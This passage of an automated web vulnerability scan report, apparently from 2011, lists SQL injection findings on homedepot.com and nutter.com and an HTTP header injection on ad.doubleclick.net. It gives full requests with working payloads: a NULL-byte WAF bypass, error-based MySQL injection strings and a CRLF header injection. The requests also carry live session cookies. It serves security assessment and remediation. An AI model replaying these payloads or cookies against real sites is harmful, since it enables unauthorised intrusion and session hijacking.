s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:02:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:02:20 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225740082%3a%3bC25%5fEXP%3d1360065740%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:02:20 GMT;Path=/


1.73. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay [catalogId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The catalogId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catalogId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053%00'&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:49:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:49:32 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:26 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:27 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22115%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24161%2c885%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816967%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:27 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228567648%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cIo18Uw%2bNrkVVDLmy9wcANV3r%2f%2bE%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053%00''&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response 2 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:49:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:49:41 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22116%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24163%2c284%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816978%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228578979%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2c8qveuGAl9W05TXvVDWRecbIcxoE%3d;Domain=.homedepot.com;Path=/


1.74. http://www.nutter.com/attorneys.php [AttorneyID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The AttorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AttorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:20 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22671

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FRO
...[SNIP]...

1.75. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit/1'+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22679

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\' 1))' at line 1 | 1064<BR>sql: SELECT FirstName,LastNa
...[SNIP]...

2. HTTP header injection

There are 26 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9fc1%0d%0a6b3dc4ec589 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9fc1%0d%0a6b3dc4ec589;src=1948992;type=wsjre849;cat=publi675;ord=5535785951651.633? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
